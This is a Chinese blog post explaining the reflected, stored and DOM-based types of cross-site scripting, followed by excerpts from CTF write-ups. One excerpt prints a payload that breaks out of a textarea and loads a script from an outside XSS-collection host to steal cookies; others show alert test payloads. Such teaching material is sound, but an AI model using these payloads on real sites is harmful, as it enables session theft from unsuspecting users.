XSS详解

最新推荐文章于 2024-05-15 22:52:56 发布
最新推荐文章于 2024-05-15 22:52:56 发布
阅读量782 收藏 1
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/105075879
版权

XSS简介:
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,将跨站脚本攻击的缩写改为XSS。XSS是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种,恶意攻击者往web页面里插入恶意script代码,当用户浏览该网页时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。攻击成功之后,恶意用户可能得到较高的权限、私密网页内容、会话和cookie等各种内容。

XSS攻击分类:
1. 反射型XSS
反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。

攻击方式:攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。
2. 存储型XSS
存储型XSS又称持久型XSS,攻击脚本将被永久保存在目标服务器的数据库或文件中,具有很高的隐蔽性。

攻击方式:这种攻击多见于论坛、博客和留言板。攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中,随着帖子被服务器存储下来,恶意脚本也被永久存放在服务器的后端存储器中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本会在他们的浏览器中得到执行。
3. DOM型XSS
DOM全称Document Object Model,DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档模型的一种漏洞,使用DOM可以使程序和脚本能够动态访问和更新文档的内容、结构及样式。

攻击方式:用户请求一个经过专门设计的url,它由攻击者提交,而且其中包含XSS代码,服务器的响应不会以任何形式包含攻击者的脚本。当用户的浏览器处理这个响应时,DOM对象就会处理XSS代码,导致存在XSS漏洞。

hangshao0.0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFCTFHub------web-XSS-反射型
从零开始的网安生活
07-23 1589
文章目录XSS反射型 XSS 反射型 1.注册登录xss平台,我的项目-创建-填写名称-选择默认模块 XSS平台在这儿 2.点击题目链接进入,将网址name=后改为平台提供的代码后,send 在项目接收内容中获得flag ...
ctfhub之xss
小宇的web博客
05-22 1641
ctfhub之xss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFhub之xss漏洞
最新发布
weixin_46954909的博客
05-15 679
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
CTFHUB-XSS
weixin_51706044的博客
09-29 475
经过测试,第一个文本框是用于测试使用 第二个文本框应该是将信息发送至后台,进行处理, 因此我们只能是在XSS测试平台上进行获取注册成功后顺便创建一个项目,选择默认配置成功后会给一个地址 直接插入构造的url中即可这时会接受到一个信息 即可获得flag ...
CTFHub——XSS
2302_79119987的博客
03-28 941
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4926
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
CTFHUB------XSS
qq_45616570的博客
06-23 728
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
CTFHub靶场————XSS
qq_61579604的博客
10-17 228
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1304
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
xss跨站攻击脚本概述
xu_1234567的博客
10-28 325
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射型xss):反射型跨站脚本漏洞,最普
2023-7-27 ctfhubxss
strider1123的博客
07-27 194
拖了好几天了,今天得赶紧把xss整完 xss:跨站脚本攻击(Cross Site Scripting),为与层叠式样表css区分写为xss xss攻击能够用来盗用cookie,获取敏感信息等 xss攻击大概分为三种:反射型,存储型,DOM型,反射型和存储型也可以叫非持续型和持续型 攻击产生的原理是由于网页在处理用户输入的文本时将<script>等作为html的标签,执行了里面的代码,...
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3327
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
ctfhub xss 反射型
m0_63253040的博客
05-07 343
上面的框会改变html源代码的内容,试试弹窗 <script>alert(1)</script> 第二框输入内容后返回successfully 这里用xss platform 具体用法参考这个wp
CTFHUB——反射型XSS详解
wuuconix's blog
09-01 7633
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射型是相对于存储型来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储型的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射型xss。 <?
CTFHub】XSS漏洞_反射型
Mitchell_Donovan的博客
04-20 1002
CTFHub_反射型XSS 原题链接 key:反射型XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射型XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 782
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
XSS学习实践全过程!
jklbnm12的博客
09-16 3655
一:什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是:恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二:简单的工具
Web脚本攻击:SQL注入与XSS详解
Web脚本漏洞主要包括SQL注入和跨站脚本攻击(XSS)。 SQL注入攻击是通过在用户提交的Web表单数据中嵌入恶意SQL代码,欺骗服务器执行非授权操作。攻击者利用两个关键条件来实施这种攻击:一是将用户名和密码查询作为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值